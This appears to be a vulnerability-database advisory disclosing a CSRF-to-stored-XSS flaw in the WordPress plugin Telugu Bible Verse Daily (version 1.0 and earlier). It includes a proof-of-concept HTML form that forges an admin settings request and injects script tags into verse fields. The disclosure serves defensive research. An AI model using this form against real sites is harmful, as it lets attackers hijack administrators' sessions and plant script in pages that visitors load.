WordPress Plugin Vulnerabilities

Telugu Bible Verse Daily <= 1.0 - CSRF to Stored XSS

Description

The plugin is lacking any CSRF check when saving its settings and verses, and do not sanitise or escape them when outputting them back in the page. This could allow attackers to make a logged in admin change the settings, as well as add malicious verses containing JavaScript code in them, leading to Stored XSS issues

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/options-general.php?page=telugu-bible-verse-daily%2FTeluguBibleVersedisplay.php" method="POST">
      <input type="hidden" name="tvd_post_type" value="fav" />
      <input type="hidden" name="tvd_connection" value="fopen" />
      <input type="hidden" name="chapter" value="<script>alert(/XSS1/)</script>" />
      <input type="hidden" name="verse" value="<script>alert(/XSS2/)</script>" />
      <input type="hidden" name="verse_add" value="Add Verse »" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

References

Classification

Type
XSS
CWE
CVSS

Miscellaneous

Original Researcher
Ashish Upsham
Submitter
Ashish
Submitter twitter
Verified
Yes

Timeline

Publicly Published
2021-07-19 (about 2 years ago)
Added
2021-07-19 (about 2 years ago)
Last Updated
2023-01-23 (about 1 years ago)

Other